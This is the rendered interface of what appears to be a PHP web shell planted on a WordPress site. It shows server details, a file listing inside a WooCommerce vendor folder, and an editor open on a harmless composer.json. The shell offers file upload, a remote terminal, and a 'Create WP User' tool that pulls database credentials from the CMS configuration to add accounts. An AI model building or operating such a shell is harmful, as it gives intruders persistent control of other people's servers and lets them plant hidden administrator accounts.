Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.217.47
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl
/
wp-content
/
plugins
/
woocommerce
/
vendor
/
automattic
/
block-delimiter
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
src
[目录]
drwxr-xr-x
2026-05-31 14:49
LICENSE.txt
17.98 KB
-rw-r--r--
2026-03-03 00:17
composer.json
1.29 KB
-rw-r--r--
2026-03-03 00:17
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
composer.json
{ "name": "automattic/block-delimiter", "description": "Efficiently work with block structure", "type": "jetpack-library", "license": "GPL-2.0-or-later", "require": { "php": ">=7.2" }, "require-dev": { "automattic/jetpack-test-environment": "@dev", "automattic/jetpack-changelogger": "^6.0.6", "automattic/phpunit-select-config": "^1.0.3" }, "autoload": { "classmap": [ "src/" ] }, "autoload-dev": { "classmap": [ "tests/php/lib/" ], "psr-4": { "Automattic\\Block_Delimiter\\Tests\\": "tests/php/" } }, "scripts": { "phpunit": [ "phpunit-select-config phpunit.#.xml.dist --colors=always" ], "test-coverage": [ "php -dpcov.directory=. ./vendor/bin/phpunit-select-config phpunit.#.xml.dist --coverage-php \"$COVERAGE_DIR/php.cov\"" ], "test-php": [ "@composer phpunit" ] }, "minimum-stability": "dev", "prefer-stable": true, "extra": { "autotagger": true, "branch-alias": { "dev-trunk": "0.3.x-dev" }, "changelogger": { "link-template": "https://github.com/Automattic/block-delimiter/compare/v${old}...v${new}" }, "mirror-repo": "Automattic/block-delimiter", "textdomain": "jetpack-block-delimiter" }, "suggest": { "automattic/jetpack-autoloader": "Allow for better interoperability with other plugins that use this package." } }
关闭
保存